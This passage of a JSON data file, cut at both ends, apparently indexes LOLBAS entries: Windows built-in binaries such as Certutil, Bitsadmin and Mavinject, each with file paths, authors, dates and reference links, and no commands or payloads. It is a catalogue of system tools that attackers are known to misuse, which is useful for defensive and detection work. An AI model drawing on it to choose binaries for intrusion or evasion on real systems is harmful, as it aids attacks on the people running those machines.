30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\AddInUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\AddInUtil.exe"],"author":"Michael McKinley @MckinleyMike","created":"2023-10-05T00:00:00.000Z","contributors":["Michael McKinley @MckinleyMike","Tony Latteri @TheLatteri"],"references":["https://lolbas-project.github.io/lolbas/Binaries/AddinUtil/"],"count":1},{"id":"lolbas:appinstaller-exe","name":"AppInstaller.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"],"author":"Wade Hickey","created":"2020-12-02T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"],"count":1},{"id":"lolbas:applaunch-exe","name":"Applaunch.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe"],"author":"Nathan Sawyer","created":"2026-08-08T00:00:00.000Z","contributors":["Nathan Sawyer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Applaunch/"],"count":1},{"id":"lolbas:aspnet-compiler-exe","name":"Aspnet_Compiler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe","c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["cpl @cpl3h"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"],"count":1},{"id":"lolbas:at-exe","name":"At.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\WINDOWS\\System32\\At.exe","C:\\WINDOWS\\SysWOW64\\At.exe"],"author":"Freddie Barr-Smith","created":"2019-09-20T00:00:00.000Z","contributors":["Freddie Barr-Smith","Riccardo Spolaor","Mariano Graziano","Xabier Ugarte-Pedrero"],"references":["https://lolbas-project.github.io/lolbas/Binaries/At/"],"count":1},{"id":"lolbas:atbroker-exe","name":"Atbroker.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Atbroker.exe","C:\\Windows\\SysWOW64\\Atbroker.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"],"count":1},{"id":"lolbas:bash-exe","name":"Bash.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Alex Ionescu @aionescu","Asif Matadar @d1r4c","Liran Ravich, CardinalOps"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"count":5},{"id":"lolbas:bitsadmin-exe","name":"Bitsadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Rob Fuller @mubix","Chris Gates @carnal0wnage","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"count":4},{"id":"lolbas:certoc-exe","name":"CertOC.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"author":"Ensar Samil","created":"2021-10-07T00:00:00.000Z","contributors":["Ensar Samil @sblmsrsn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CertOC/"],"count":2},{"id":"lolbas:certreq-exe","name":"CertReq.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"author":"David Middlehurst","created":"2020-07-07T00:00:00.000Z","contributors":["David Middlehurst @dtmsecurity"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CertReq/"],"count":2},{"id":"lolbas:certutil-exe","name":"Certutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Moriarty @Moriarty_Meng","egre55 @egre55","Lior Adar","Adam @hexacorn","SomeTestLeper @SomeTestLeper"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"count":7},{"id":"lolbas:change-exe","name":"Change.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\change.exe","c:\\windows\\syswow64\\change.exe"],"author":"Idan Lerman","created":"2025-07-31T00:00:00.000Z","contributors":["Idan Lerman @IdanLerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Change/"],"count":1},{"id":"lolbas:cipher-exe","name":"Cipher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"author":"Adetutu Ogunsowo","created":"2024-11-22T00:00:00.000Z","contributors":["Ade Ogunsowo @i_am_tutu","Alexander Sennhauser @conitrade"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cipher/"],"count":2},{"id":"lolbas:cmd-exe","name":"Cmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"author":"Ye Yint Min Thu Htut","created":"2019-06-26T00:00:00.000Z","contributors":["r0lan @yeyint_mth","Mr.0range @mr_0rng"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"count":4},{"id":"lolbas:cmdkey-exe","name":"Cmdkey.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmdkey.exe","C:\\Windows\\SysWOW64\\cmdkey.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"],"count":1},{"id":"lolbas:cmdl32-exe","name":"cmdl32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmdl32.exe","C:\\Windows\\SysWOW64\\cmdl32.exe"],"author":"Elliot Killick","created":"2021-08-26T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/cmdl32/"],"count":1},{"id":"lolbas:cmstp-exe","name":"Cmstp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","Nick Tyrer @NickTyrer","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"count":3},{"id":"lolbas:colorcpl-exe","name":"Colorcpl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\colorcpl.exe","C:\\Windows\\SysWOW64\\colorcpl.exe"],"author":"Arjan Onwezen","created":"2023-06-26T00:00:00.000Z","contributors":["eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"],"count":1},{"id":"lolbas:computerdefaults-exe","name":"ComputerDefaults.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ComputerDefaults.exe","C:\\Windows\\SysWOW64\\ComputerDefaults.exe"],"author":"Eron Clarke","created":"2024-09-24T00:00:00.000Z","contributors":["Eron Clarke"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/"],"count":1},{"id":"lolbas:configsecuritypolicy-exe","name":"ConfigSecurityPolicy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"author":"Ialle Teixeira","created":"2020-09-04T00:00:00.000Z","contributors":["Ialle Teixeira @NtSetDefault","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"],"count":2},{"id":"lolbas:conhost-exe","name":"Conhost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\conhost.exe"],"author":"Wietze Beukema","created":"2022-04-05T00:00:00.000Z","contributors":["Adam @hexacorn","Wietze @wietze"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Conhost/"],"count":2},{"id":"lolbas:control-exe","name":"Control.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Control/"],"count":2},{"id":"lolbas:csc-exe","name":"Csc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Csc/"],"count":2},{"id":"lolbas:cscript-exe","name":"Cscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cscript.exe","C:\\Windows\\SysWOW64\\cscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cscript/"],"count":1},{"id":"lolbas:customshellhost-exe","name":"CustomShellHost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\CustomShellHost.exe"],"author":"Wietze Beukema","created":"2021-11-14T00:00:00.000Z","contributors":["John Carroll @YoSignals"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"],"count":1},{"id":"lolbas:datasvcutil-exe","name":"DataSvcUtil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"],"author":"Ialle Teixeira","created":"2020-12-01T00:00:00.000Z","contributors":["Ialle Teixeira @NtSetDefault"],"references":["https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"],"count":1},{"id":"lolbas:desktopimgdownldr-exe","name":"Desktopimgdownldr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\desktopimgdownldr.exe"],"author":"Gal Kristal","created":"2020-06-28T00:00:00.000Z","contributors":["Gal Kristal @gal_kristal"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"],"count":1},{"id":"lolbas:devicecredentialdeployment-exe","name":"DeviceCredentialDeployment.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\DeviceCredentialDeployment.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"],"count":1},{"id":"lolbas:dfsvc-exe","name":"Dfsvc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"],"count":1},{"id":"lolbas:diantz-exe","name":"Diantz.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"author":"Tamir Yehuda","created":"2020-08-08T00:00:00.000Z","contributors":["Tamir Yehuda @tim8288","Hai Vaknin @vakninhai"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"count":3},{"id":"lolbas:diskshadow-exe","name":"Diskshadow.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"],"count":2},{"id":"lolbas:dnscmd-exe","name":"Dnscmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Dnscmd.exe","C:\\Windows\\SysWOW64\\Dnscmd.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Shay Ber","Dimitrios Slamaris @dim0x69","Nikhil SamratAshok @nikhil_mitt"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"],"count":1},{"id":"lolbas:esentutl-exe","name":"Esentutl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["egre55 @egre55","Mike Cary @grayfold3d"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"count":6},{"id":"lolbas:eudcedit-exe","name":"Eudcedit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\eudcedit.exe","c:\\windows\\syswow64\\eudcedit.exe"],"author":"Matan Bahar","created":"2025-08-07T00:00:00.000Z","contributors":["Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Eudcedit/"],"count":1},{"id":"lolbas:eventvwr-exe","name":"Eventvwr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"author":"Jacob Gajek","created":"2018-11-01T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3","Matt Graeber @mattifestation","Orange Tsai @orange_8361"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"],"count":2},{"id":"lolbas:expand-exe","name":"Expand.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Rahmat Nurfauzi @infosecn1nja","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"count":3},{"id":"lolbas:explorer-exe","name":"Explorer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"author":"Jai Minton","created":"2020-06-24T00:00:00.000Z","contributors":["Jai Minton @CyberRaiju","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Explorer/"],"count":2},{"id":"lolbas:extexport-exe","name":"Extexport.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Internet Explorer\\Extexport.exe","C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Extexport/"],"count":1},{"id":"lolbas:extrac32-exe","name":"Extrac32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["egre55 @egre55","Oddvar Moe @oddvarmoe","Hai Vaknin(Lux @VakninHai","Tamir Yehuda @tim8288"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"count":4},{"id":"lolbas:findstr-exe","name":"Findstr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"count":4},{"id":"lolbas:finger-exe","name":"Finger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\finger.exe","c:\\windows\\syswow64\\finger.exe"],"author":"Ruben Revuelta","created":"2021-08-30T00:00:00.000Z","contributors":["Ruben Revuelta (MAPFRE CERT) @rubn_RB","Jose A. Jimenez (MAPFRE CERT) @Ocelotty6669","Malwrologist @DissectMalware"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Finger/"],"count":1},{"id":"lolbas:fltmc-exe","name":"fltMC.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\fltMC.exe"],"author":"John Lambert","created":"2021-09-18T00:00:00.000Z","contributors":["Carlos Perez @Carlos_Perez"],"references":["https://lolbas-project.github.io/lolbas/Binaries/fltMC/"],"count":1},{"id":"lolbas:forfiles-exe","name":"Forfiles.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Eric @vector_sec","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"],"count":2},{"id":"lolbas:fsutil-exe","name":"Fsutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick","Jimmy @bohops","Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"count":3},{"id":"lolbas:ftp-exe","name":"Ftp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"author":"Oddvar Moe","created":"2018-12-10T00:00:00.000Z","contributors":["Casey Smith @subtee","BennyHusted","Amit Serper @0xAmit"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ftp/"],"count":2},{"id":"lolbas:gpscript-exe","name":"Gpscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"],"count":2},{"id":"lolbas:hh-exe","name":"Hh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"count":3},{"id":"lolbas:imewdbld-exe","name":"IMEWDBLD.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"],"author":"Wade Hickey","created":"2020-03-05T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"],"count":1},{"id":"lolbas:ie4uinit-exe","name":"Ie4uinit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\ie4uinit.exe","c:\\windows\\sysWOW64\\ie4uinit.exe","c:\\windows\\system32\\ieuinit.inf","c:\\windows\\sysWOW64\\ieuinit.inf"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"],"count":1},{"id":"lolbas:iediagcmd-exe","name":"iediagcmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Internet Explorer\\iediagcmd.exe"],"author":"manasmbellani","created":"2022-03-29T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/iediagcmd/"],"count":1},{"id":"lolbas:ieexec-exe","name":"Ieexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"],"count":2},{"id":"lolbas:ilasm-exe","name":"Ilasm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"author":"Hai vaknin (lux)","created":"2020-03-17T00:00:00.000Z","contributors":["Hai Vaknin(Lux) @VakninHai","Lior Adar"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"],"count":2},{"id":"lolbas:infdefaultinstall-exe","name":"Infdefaultinstall.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Infdefaultinstall.exe","C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan @kylehanslovan"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"],"count":1},{"id":"lolbas:installutil-exe","name":"Installutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"count":3},{"id":"lolbas:iscsicpl-exe","name":"iscsicpl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"author":"Ekitji","created":"2025-08-17T00:00:00.000Z","contributors":["hacker.house","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"],"count":2},{"id":"lolbas:jsc-exe","name":"Jsc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"author":"Oddvar Moe","created":"2019-05-31T00:00:00.000Z","contributors":["Malwrologist @DissectMalware"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Jsc/"],"count":2},{"id":"lolbas:ldifde-exe","name":"Ldifde.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\ldifde.exe","c:\\windows\\syswow64\\ldifde.exe"],"author":"Grzegorz Tworek","created":"2022-08-31T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"],"count":1},{"id":"lolbas:makecab-exe","name":"Makecab.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"count":4},{"id":"lolbas:mavinject-exe","name":"Mavinject.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Giuseppe N3mes1s @gN3mes1s","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"],"count":2},{"id":"lolbas:microsoft-workflow-compiler-exe","name":"Microsoft.Workflow.Compiler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"author":"Conor Richard","created":"2018-10-22T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","John Bergbom @BergbomJohn","FortyNorth Security @FortyNorthSec","Bank Security @Bank_Security"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"count":3},{"id":"lolbas:mmc-exe","name":"Mmc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"author":"@bohops","created":"2018-12-04T00:00:00.000Z","contributors":["Jimmy @bohops","clem @clavoillotte","Fredrik H. Brathen"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"count":3},{"id":"lolbas:mofcomp-exe","name":"Mofcomp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbem\\mofcomp.exe","C:\\Windows\\SysWOW64\\wbem\\mofcomp.exe"],"author":"Daniel Gott","created":"2022-07-19T00:00:00.000Z","contributors":["Daniel Gott @gott_cyber","The DFIR Report @TheDFIRReport","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mofcomp/"],"count":1},{"id":"lolbas:mpcmdrun-exe","name":"MpCmdRun.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows 